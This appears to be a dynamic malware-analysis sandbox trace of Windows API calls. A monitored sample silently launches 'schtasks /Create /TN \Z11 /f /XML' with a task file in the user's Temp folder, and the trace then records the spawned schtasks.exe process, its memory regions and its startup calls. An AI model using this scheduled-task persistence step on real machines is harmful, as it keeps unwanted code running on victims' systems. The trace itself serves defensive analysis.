[0216.264] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x12a99d40, _DstSize=0xb, _VarName="windir" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Windows") returned 0x0
[0216.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Windows", cbMultiByte=11, lpWideCharStr=0x11afe4c8, cchWideChar=22 | out: lpWideCharStr="C:\\Windows") returned 11
[0216.264] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Windows", psz=0x0, len=0xa | out: pbstr=0x15dad8*="C:\\Windows") returned 1
[0216.264] CRetailMalloc_Free () returned 0x16ed305b80001
[0216.264] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\sysnative\\schtasks.exe", cchWideChar=-1, lpMultiByteStr=0x15d620, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\sysnative\\schtasks.exe", lpUsedDefaultChar=0x0) returned 34
[0216.264] _fullpath (in: _FullPath=0x15d920, _Path="C:\\Windows\\sysnative\\schtasks.exe", _SizeInBytes=0x104 | out: _FullPath="C:\\Windows\\sysnative\\schtasks.exe") returned="C:\\Windows\\sysnative\\schtasks.exe"
[0216.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\sysnative\\schtasks.exe", cchWideChar=-1, lpMultiByteStr=0x15d810, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\sysnative\\schtasks.exe", lpUsedDefaultChar=0x0) returned 34
[0216.265] _findfirst64i32 (in: _FileName="C:\\Windows\\sysnative\\schtasks.exe", _FindData=0x15db60 | out: _FindData=0x15db60) returned 0xffffffffffffffff
[0216.266] _errno () returned 0x5321300
[0216.266] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1
[0216.266] VarBstrCat (in: bstrLeft=" /Create /TN \\Z11", bstrRight=" /f /XML ", pbstrResult=0x15dd40 | out: pbstrResult=0x15dd40) returned 0x0
[0216.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.267] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.267] CRetailMalloc_Alloc () returned 0x12b40240
[0216.267] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x12b40240, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x7466b58, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.267] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.267] CRetailMalloc_Free () returned 0x3010eba011c0401
[0216.267] VarAdd (in: pvarLeft=0x1086ee60, pvarRight=0x1086ee78, pvarResult=0x1086ee18 | out: pvarResult=0x1086ee18) returned 0x0
[0216.267] VarAdd (in: pvarLeft=0x1086ee18, pvarRight=0x1086ef58, pvarResult=0x1086ee00 | out: pvarResult=0x1086ee00) returned 0x0
[0216.268] VarAdd (in: pvarLeft=0x1086ee38, pvarRight=0x1086ef70, pvarResult=0x1086ef90 | out: pvarResult=0x1086ef90) returned 0x0
[0216.268] VarBstrCat (in: bstrLeft="schtasks", bstrRight=" /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", pbstrResult=0x15dcf0 | out: pbstrResult=0x15dcf0) returned 0x0
[0216.268] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="schtasks /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x15dc70*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x15dc50 | out: lpCommandLine="schtasks /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpProcessInformation=0x15dc50*(hProcess=0x7dc, hThread=0x834, dwProcessId=0x1e4, dwThreadId=0x4e8)) returned 1
[0216.291] GetLastError () returned 0x0
[0216.291] WaitForInputIdle (hProcess=0x7dc, dwMilliseconds=0x2710) returned 0xffffffff
[0216.292] CloseHandle (hObject=0x834) returned 1
[0216.292] CloseHandle (hObject=0x7dc) returned 1
[0216.294] SafeArrayDestroyData (psa=0x1086f010) returned 0x0
[0216.294] SafeArrayDestroyData (psa=0x1086efe8) returned 0x0
[0216.294] SafeArrayDestroyData (psa=0x1086efc0) returned 0x0
Thread:
id = 23
os_tid = 0xec8
Thread:
id = 24
os_tid = 0xecc
Thread:
id = 25
os_tid = 0xed0
Thread:
id = 26
os_tid = 0xed4
Thread:
id = 27
os_tid = 0xed8
Thread:
id = 28
os_tid = 0xee0
Thread:
id = 29
os_tid = 0xee4
Thread:
id = 30
os_tid = 0xef0
Thread:
id = 31
os_tid = 0xef4
Thread:
id = 32
os_tid = 0xef8
Thread:
id = 33
os_tid = 0x8e8
Thread:
id = 34
os_tid = 0x750
Thread:
id = 35
os_tid = 0xef8
Thread:
id = 36
os_tid = 0xeb8
Thread:
id = 37
os_tid = 0x660
Thread:
id = 38
os_tid = 0x66c
Process:
id = "2"
image_name = "schtasks.exe"
filename = "c:\\windows\\system32\\schtasks.exe"
page_root = "0x4609a000"
os_pid = "0x1e4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xe44"
cmd_line = "schtasks /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1042
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1043
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1044
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1045
start_va = 0x110000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1046
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1047
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1048
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1049
start_va = 0xffe20000
end_va = 0xffe67fff
monitored = 1
entry_point = 0xffe4966c
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")
Region:
id = 1050
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1051
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1052
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1053
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1054
start_va = 0x190000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1055
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1056
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1057
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1058
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1059
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1060
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1061
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1062
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1063
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1064
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1065
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1066
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1067
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1068
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1069
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1070
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1071
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1072
start_va = 0xc0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1073
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1074
start_va = 0x2d0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1075
start_va = 0x3d0000
end_va = 0x557fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1076
start_va = 0xe0000
end_va = 0x108fff
monitored = 0
entry_point = 0xe1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1077
start_va = 0xe0000
end_va = 0x108fff
monitored = 0
entry_point = 0xe1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1078
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1079
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1080
start_va = 0x560000
end_va = 0x6e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1081
start_va = 0x6f0000
end_va = 0x1aeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 1082
start_va = 0xe0000
end_va = 0xf1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\System32\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\schtasks.exe.mui")
Region:
id = 1083
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1084
start_va = 0xd0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1085
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1087
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1088
start_va = 0x1af0000
end_va = 0x1dbefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1089
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1090
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1091
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1092
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1093
start_va = 0x1dc0000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001dc0000"
filename = ""
Region:
id = 1094
start_va = 0x1eb0000
end_va = 0x1f8efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001eb0000"
filename = ""
Region:
id = 1095
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1096
start_va = 0x1ff0000
end_va = 0x206ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 1097
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1098
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1099
start_va = 0x290000
end_va = 0x290fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 1100
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1101
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002a0000"
filename = ""
Region:
id = 1102
start_va = 0x7fefb530000
end_va = 0x7fefb656fff
monitored = 0
entry_point = 0x7fefb5310ec
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1103
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Thread:
id = 39
os_tid = 0x4e8
[0218.966] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f950 | out: lpSystemTimeAsFileTime=0x18f950*(dwLowDateTime=0x9aaef280, dwHighDateTime=0x1dab598))
[0218.966] GetCurrentProcessId () returned 0x1e4
[0218.966] GetCurrentThreadId () returned 0x4e8
[0218.966] GetTickCount () returned 0x13fff2c
[0218.966] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x18f958 | out: lpPerformanceCount=0x18f958*=2109966367191) returned 1
[0219.091] GetModuleHandleW (lpModuleName=0x0) returned 0xffe20000
[0219.091] __set_app_type (_Type=0x1)
[0219.091] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe4972c) returned 0x0
[0219.092] __wgetmainargs (in: _Argc=0xffe61240, _Argv=0xffe61250, _Env=0xffe61248, _DoWildCard=0, _StartInfo=0xffe6125c | out: _Argc=0xffe61240, _Argv=0xffe61250, _Env=0xffe61248) returned 0
[0219.214] _onexit (_Func=0xffe52ab0) returned 0xffe52ab0
[0219.214] _onexit (_Func=0xffe52ac4) returned 0xffe52ac4
[0219.214] _onexit (_Func=0xffe52afc) returned 0xffe52afc
[0219.215] _onexit (_Func=0xffe52b58) returned 0xffe52b58
[0219.215] _onexit (_Func=0xffe52b80) returned 0xffe52b80
[0219.215] _onexit (_Func=0xffe52ba8) returned 0xffe52ba8
[0219.215] _onexit (_Func=0xffe52bd0) returned 0xffe52bd0
[0219.216] _onexit (_Func=0xffe52bf8) returned 0xffe52bf8
[0219.216] _onexit (_Func=0xffe52c20) returned 0xffe52c20
[0219.216] _onexit (_Func=0xffe52c48) returned 0xffe52c48
[0219.217] _onexit (_Func=0xffe52c70) returned 0xffe52c70
[0219.358] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0219.385] WinSqmIsOptedIn () returned 0x0
[0219.496] GetProcessHeap () returned 0x2d0000
[0219.496] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebb20
[0219.496] SetLastError (dwErrCode=0x0)
[0219.496] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0219.497] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0219.497] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0219.497] VerifyVersionInfoW (in: lpVersionInformation=0x18f110, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x18f110) returned 1
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.497] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebb40
[0219.497] lstrlenW (lpString="") returned 0
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.497] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x2) returned 0x2ebb60
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.497] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ab0
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebb80
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ae0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b10
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b40
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b70
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebba0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ba0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5bd0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c00
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c30
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebbc0
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c60
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c90
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5cc0
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5cf0
[0219.499] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0219.500] SetLastError (dwErrCode=0x0)
[0219.500] GetProcessHeap () returned 0x2d0000
[0219.500] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5d20
[0219.500] GetProcessHeap () returned 0x2d0000
[0219.500] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5d50
[0219.500] GetProcessHeap () returned 0x2d0000
[0219.500] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5d80
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5db0
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5de0
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebbe0
[0219.501] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x208) returned 0x2ebd80
[0219.501] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ebd80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0219.502] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefc990000
[0219.506] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoSizeW") returned 0x7fefc9915fc
[0219.506] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0219.508] GetProcessHeap () returned 0x2d0000
[0219.508] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x74e) returned 0x2ec350
[0219.508] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoW") returned 0x7fefc991614
[0219.508] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x2ec350 | out: lpData=0x2ec350) returned 1
[0219.509] GetProcAddress (hModule=0x7fefc990000, lpProcName="VerQueryValueW") returned 0x7fefc9915e0
[0219.509] VerQueryValueW (in: pBlock=0x2ec350, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18f1f8, puLen=0x18f260 | out: lplpBuffer=0x18f1f8*=0x2ec6ec, puLen=0x18f260) returned 1
[0219.512] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
